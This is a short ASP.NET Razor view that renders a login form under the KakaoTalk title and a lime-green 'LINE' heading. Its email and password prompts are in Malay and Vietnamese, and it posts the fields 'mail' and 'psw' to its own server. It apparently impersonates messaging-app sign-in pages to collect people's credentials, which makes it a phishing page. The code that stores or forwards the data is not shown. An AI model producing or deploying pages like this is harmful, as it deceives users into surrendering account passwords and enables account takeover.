
@{
    Layout = null;
}

<!DOCTYPE html>

<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>KakaoTalk</title>
</head>
<body>
    <div>
        @using (Html.BeginForm())
        {
            <table align="center">
                <tr>
                    <td>
                        <h1 style="text-align: center; padding-top: 45px; font-family: Arial; color:limegreen">LINE</h1>

                        <table align="center" style="width:390px">
                            <tr>
                                <td style="width:380px">
                                    <input type="text"
                                           placeholder="Alamat E-mel"
                                           name="mail"
                                           required
                                           style="width: 378px; height: 35px; border: none !important" />
                                </td>
                            </tr>
                            <tr>
                                <td style="width:380px; padding-top:10px; padding-bottom:20px">
                                    <input type="password" placeholder="Mật khẩu" name="psw" required style="width: 378px; height: 35px; border: none !important" />
                                </td>
                            </tr>
                            <tr>
                                <td>
                                    <input type="submit" value="Đăng nhập" style="width: 380px; height: 55px !important; background-color: limegreen !important;
                                                                                  border: none !important; font-weight: bold; color:white" />
                                </td>
                            </tr>
                        </table>
                    </td>
                </tr>
            </table>
         }
    </div>
</body>
</html>
